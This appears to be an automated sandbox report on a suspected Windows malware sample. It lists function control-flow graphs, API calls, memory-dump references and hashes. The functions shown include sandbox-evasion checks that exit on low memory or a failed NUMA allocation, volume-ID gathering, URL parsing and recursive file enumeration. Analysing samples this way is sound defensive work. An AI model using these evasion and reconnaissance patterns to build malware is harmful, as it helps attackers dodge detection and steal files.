                            Function 00D82740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2782 d82740-d82783 GetWindowsDirectoryA 2783 d8278c-d827ea GetVolumeInformationA 2782->2783 2784 d82785 2782->2784 2785 d827ec-d827f2 2783->2785 2784->2783 2786 d82809-d82820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 d827f4-d82807 2785->2787 2788 d82822-d82824 2786->2788 2789 d82826-d82844 wsprintfA 2786->2789 2787->2785 2790 d8285b-d82872 call d871e0 2788->2790 2789->2790
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00D8277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00D793B6,00000000,00000000,00000000,00000000), ref: 00D827AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D8280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82816
                            • wsprintfA.USER32 ref: 00D8283B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 14a9a943a3590634cce8e722274ea53c69754470c308c9a38c9a321cdb1020e9
                            • Instruction ID: 7e2972f17cf24aec3cf2b276aae0b6223a6d3749fe0f47e36315ec16a14c8b71
                            • Opcode Fuzzy Hash: 14a9a943a3590634cce8e722274ea53c69754470c308c9a38c9a321cdb1020e9
                            • Instruction Fuzzy Hash: 25316DB19082099FCB14DFB98A859EFBFBCEF59750F10016AE515E7650E2348A408BB1
                            Function 00D64BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2793 d64bc0-d64bce 2794 d64bd0-d64bd5 2793->2794 2794->2794 2795 d64bd7-d64c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call d62a20 2794->2795
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00D64BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00D64C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00D64C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00D64C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00D64C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 5527672a904ff5a5c3b22f4e306ea96b3fd460cfccc8a6e301362340c6b0ba7a
                            • Instruction ID: 1a0d0c8ed0ae6aa1d172427a8321ea9b7d726f1920a9512e34a1ea5b71229067
                            • Opcode Fuzzy Hash: 5527672a904ff5a5c3b22f4e306ea96b3fd460cfccc8a6e301362340c6b0ba7a
                            • Instruction Fuzzy Hash: B1014071D00218AFDB10DFA8EC45B9EBBB8EB09364F004126F914E7390EB7459058FD4
                            Function 00D61030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2798 d61030-d61055 GetCurrentProcess VirtualAllocExNuma 2799 d61057-d61058 ExitProcess 2798->2799 2800 d6105e-d6107b VirtualAlloc 2798->2800 2801 d61082-d61088 2800->2801 2802 d6107d-d61080 2800->2802 2803 d610b1-d610b6 2801->2803 2804 d6108a-d610ab VirtualFree 2801->2804 2802->2801 2804->2803
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D61046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D6104D
                            • ExitProcess.KERNEL32 ref: 00D61058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D6106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00D610AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 806c9548adbda060f566d1d8e7de4464e25d122f96dafcd1e787b2dc6901c894
                            • Instruction ID: 2b091d34cab3e33a3e244496e204de76159443a250a6a8330a2bc034cc8e4802
                            • Opcode Fuzzy Hash: 806c9548adbda060f566d1d8e7de4464e25d122f96dafcd1e787b2dc6901c894
                            • Instruction Fuzzy Hash: 3701F4757443087BEB204B796C5AF6B77ADA785B05F248019F704E72D0D9B2E9009A64
                            Function 00D7EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2805 d7ee90-d7eeb5 call d62930 2808 d7eeb7-d7eebf 2805->2808 2809 d7eec9-d7eecd call d66c40 2805->2809 2808->2809 2810 d7eec1-d7eec3 lstrcpy 2808->2810 2812 d7eed2-d7eee8 StrCmpCA 2809->2812 2810->2809 2813 d7ef11-d7ef18 call d62a20 2812->2813 2814 d7eeea-d7ef02 call d62a20 call d62930 2812->2814 2820 d7ef20-d7ef28 2813->2820 2823 d7ef45-d7efa0 call d62a20 * 10 2814->2823 2824 d7ef04-d7ef0c 2814->2824 2820->2820 2822 d7ef2a-d7ef37 call d62930 2820->2822 2822->2823 2830 d7ef39 2822->2830 2824->2823 2826 d7ef0e-d7ef0f 2824->2826 2829 d7ef3e-d7ef3f lstrcpy 2826->2829 2829->2823 2830->2829
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00D7EEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00D7EF3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: ffa23cbb2ea63295fa798382292ee42bcb872b82c5c534779385d3e1b4a1d196
                            • Instruction ID: 2fe141f219a991b7d31fc71f0a7f5c8a40a459acb39213cca82c09ac2d433427
                            • Opcode Fuzzy Hash: ffa23cbb2ea63295fa798382292ee42bcb872b82c5c534779385d3e1b4a1d196
                            • Instruction Fuzzy Hash: D62136306616059FCB21FFB8DC56AAE77B4EF14304F085569F84ADB652EA70DD048BB0
                            Function 00D610C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2886 d610c0-d610cb 2887 d610d0-d610dc 2886->2887 2889 d610de-d610f3 GlobalMemoryStatusEx 2887->2889 2890 d610f5-d61106 2889->2890 2891 d61112-d61114 ExitProcess 2889->2891 2892 d6111a-d6111d 2890->2892 2893 d61108 2890->2893 2893->2891 2894 d6110a-d61110 2893->2894 2894->2891 2894->2892
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 09b0b08081718a8b4b2c583ae12d7cab27d98d2a992bbade59cc830375f50576
                            • Instruction ID: 06ba3a683e1028d9203254135c5c0ab0421fbc822b04702f697dd310093bc91b
                            • Opcode Fuzzy Hash: 09b0b08081718a8b4b2c583ae12d7cab27d98d2a992bbade59cc830375f50576
                            • Instruction Fuzzy Hash: CCF0A77451C3495BEB146B78D84B72DF7D8EB02350F1C492DEEAAC2191E674C8449177
                            Function 00D78C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2895 d78c88-d78cc4 StrCmpCA 2897 d78cc6-d78cc7 ExitProcess 2895->2897 2898 d78ccd-d78ce6 2895->2898 2900 d78ee2-d78eef call d62a20 2898->2900 2901 d78cec-d78cf1 2898->2901 2902 d78cf6-d78cf9 2901->2902 2904 d78ec3-d78edc 2902->2904 2905 d78cff 2902->2905 2904->2900 2942 d78cf3 2904->2942 2907 d78e56-d78e64 StrCmpCA 2905->2907 2908 d78d30-d78d3f lstrlen 2905->2908 2909 d78dbd-d78dcb StrCmpCA 2905->2909 2910 d78ddd-d78deb StrCmpCA 2905->2910 2911 d78dfd-d78e0b StrCmpCA 2905->2911 2912 d78e1d-d78e2b StrCmpCA 2905->2912 2913 d78e3d-d78e4b StrCmpCA 2905->2913 2914 d78d5a-d78d69 lstrlen 2905->2914 2915 d78d06-d78d15 lstrlen 2905->2915 2916 d78d84-d78d92 StrCmpCA 2905->2916 2917 d78da4-d78db8 StrCmpCA 2905->2917 2918 d78e6f-d78e7d StrCmpCA 2905->2918 2919 d78e88-d78e9a lstrlen 2905->2919 2907->2904 2931 d78e66-d78e6d 2907->2931 2935 d78d41-d78d46 call d62a20 2908->2935 2936 d78d49-d78d55 call d62930 2908->2936 2909->2904 2924 d78dd1-d78dd8 2909->2924 2910->2904 2925 d78df1-d78df8 2910->2925 2911->2904 2926 d78e11-d78e18 2911->2926 2912->2904 2927 d78e31-d78e38 2912->2927 2913->2904 2928 d78e4d-d78e54 2913->2928 2920 d78d73-d78d7f call d62930 2914->2920 2921 d78d6b-d78d70 call d62a20 2914->2921 2929 d78d17-d78d1c call d62a20 2915->2929 2930 d78d1f-d78d2b call d62930 2915->2930 2916->2904 2923 d78d98-d78d9f 2916->2923 2917->2904 2918->2904 2932 d78e7f-d78e86 2918->2932 2933 d78ea4-d78eb0 call d62930 2919->2933 2934 d78e9c-d78ea1 call d62a20 2919->2934 2954 d78eb3-d78eb5 2920->2954 2921->2920 2923->2904 2924->2904 2925->2904 2926->2904 2927->2904 2928->2904 2929->2930 2930->2954 2931->2904 2932->2904 2933->2954 2934->2933 2935->2936 2936->2954 2942->2902 2954->2904 2955 d78eb7-d78eb9 2954->2955 2955->2904 2956 d78ebb-d78ebd lstrcpy 2955->2956 2956->2904
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 4778396e779ec218aa3b9fb42d326d0a2fddf2a753d06bf89dd30528441d84b0
                            • Instruction ID: f06685dbb8d08ad36bafd13655a8bbc4843ed11b12f2d55b21e31d4d300255e7
                            • Opcode Fuzzy Hash: 4778396e779ec218aa3b9fb42d326d0a2fddf2a753d06bf89dd30528441d84b0
                            • Instruction Fuzzy Hash: F2E0DF15708249ABCB205BB99CA8CCB7BAA8FC4200B46802ABA444BA55E974DD06C325
                            Function 00D6100D Relevance: 4.5, APIs: 3, Instructions: 35memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D61046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D6104D
                            • ExitProcess.KERNEL32 ref: 00D61058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D6106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00D610AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 30b10f1e9e0143621802ed323c4fe642ed3460982cf4cbacbabd92ed55616d94
                            • Instruction ID: bbfb6ce103ffc8f4003b552fa178f2069258d5ca20b75bb05978096d9787a639
                            • Opcode Fuzzy Hash: 30b10f1e9e0143621802ed323c4fe642ed3460982cf4cbacbabd92ed55616d94
                            • Instruction Fuzzy Hash: 9BE04F702883447FE62207658C49F163A6CAB43B41F054046F6449B0E1C1E5A801AA39

                            Non-executed Functions

                            Function 00D72390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D723D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D723F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D72402
                            • lstrlen.KERNEL32(\*.*), ref: 00D7240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D72436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D72486
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 24c316b1f6686686a069952302fff82d0e25a57d76ebd9a101ae48da166d4d3d
                            • Instruction ID: d0bbd6f353624cc5bfa94673e055817e2c08733237ca49b72b20175de87a9b38
                            • Opcode Fuzzy Hash: 24c316b1f6686686a069952302fff82d0e25a57d76ebd9a101ae48da166d4d3d
                            • Instruction Fuzzy Hash: F5A2803191165A9FCB21EFB8DC89ABE77B9EF44700F098029B809D7251EB74DD458BB0
                            Function 00D616A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D616E2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6176C
                            • lstrcat.KERNEL32(00000000), ref: 00D61776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D617A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D617EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D617F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61875
                            • lstrcat.KERNEL32(00000000), ref: 00D6187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D618AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D618F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D618FE
